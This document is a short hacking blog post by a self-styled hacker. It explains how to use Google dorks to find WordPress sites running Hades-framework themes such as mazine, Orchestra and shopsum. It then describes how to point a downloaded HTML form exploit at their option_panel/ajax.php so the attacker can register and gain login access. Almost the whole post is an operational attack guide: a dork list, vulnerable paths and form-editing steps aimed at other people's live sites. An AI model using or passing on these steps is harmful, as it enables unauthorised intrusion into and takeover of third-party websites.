Download exploit from:- http://pastebin.com/nXK641Yf
How to use this exploit:-
Copy any google dork from the given link and paste it on google and open sites which has '/wp-content/themes/DORK/' in the link.
Copy '/DORK/hades_framework/option_panel/ajax.php' from the exploit and paste it after the '/wp-content/themes/', if page return 'blank' or '0' it means it's vulnerable you can exploit the website.
Download the exploit from given link:- 'http://pastebin.com/nXK641Yf' and change '<form action="http://site.com/…/yvo…/hades_framework/option_panel/ajax.php" method="POST">' 'site.com' with the vulnerable website you have got using dorks.
And '<input name="values[1][value]" value="Your Email here">' Change 'Your Email Here' with your email.
Now save it with 'anything.php' and open with firefox or chrome, do not change anything when uh open the 'php' and you can upload the exploit on any website using shell or uploader and then click on 'Submit', Page will redirects to 'http://site.com…/so…//hades_framework/option_panel/ajax.php' and 'Success' written on the page, it means it's done now got to 'http://site.com/wp-login.php?action=register' It will ask for 'username' And 'Email' Add your username and email and hit 'enter' or click 'register' after this you will get email from the site with login detail.
How to find vulnerablity and use dorks:-
Dork - inurl:/wp-content/themes/mazine/
Vulnerability - /mazine/hades_framework/option_panel/ajax.php
Vulnerability - /mazine/hades_framework/option_panel/ajax.php
Dork - inurl:/wp-content/themes/Orchestra/
Vulnerability - /Orchestra/hades_framework/option_panel/ajax.php
Vulnerability - /Orchestra/hades_framework/option_panel/ajax.php
Dork - inurl:/wp-content/themes/shopsum/
Vulnerability - /shopsum/hades_framework/option_panel/ajax.php
Vulnerability - /shopsum/hades_framework/option_panel/ajax.php
Dork - inurl:/wp-content/themes/shotzz/
Vulnerability - /shotzz/hades_framework/option_panel/ajax.php
Vulnerability - /shotzz/hades_framework/option_panel/ajax.php
Dork - inurl:/wp-content/themes/test/
Vulnerability - /test/hades_framework/option_panel/ajax.php
Vulnerability - /test/hades_framework/option_panel/ajax.php
Dork - inurl:/wp-content/themes/Viteeo/
Vulnerability - /Viteeo/hades_framework/option_panel/ajax.php
Vulnerability - /Viteeo/hades_framework/option_panel/ajax.php
Dork - inurl:/wp-content/themes/vithy/
Vulnerability - /vithy/hades_framework/option_panel/ajax.php
Vulnerability - /vithy/hades_framework/option_panel/ajax.php
Dork - inurl:/wp-content/themes/yvora/
Vulnerability - /yvora/hades_framework/option_panel/ajax.php
Vulnerability - /yvora/hades_framework/option_panel/ajax.php
Dork - inurl:/wp-content/themes/sodales
Vulnerability - /sodales/hades_framework/option_panel/ajax.php
Vulnerability - /sodales/hades_framework/option_panel/ajax.php
Only:- Few websites are vulnerable
#S0ft Hcks!
#MR:47{XYBER SHEIKH}
#S0ft Hcks!
#MR:47{XYBER SHEIKH}
No comments:
Post a Comment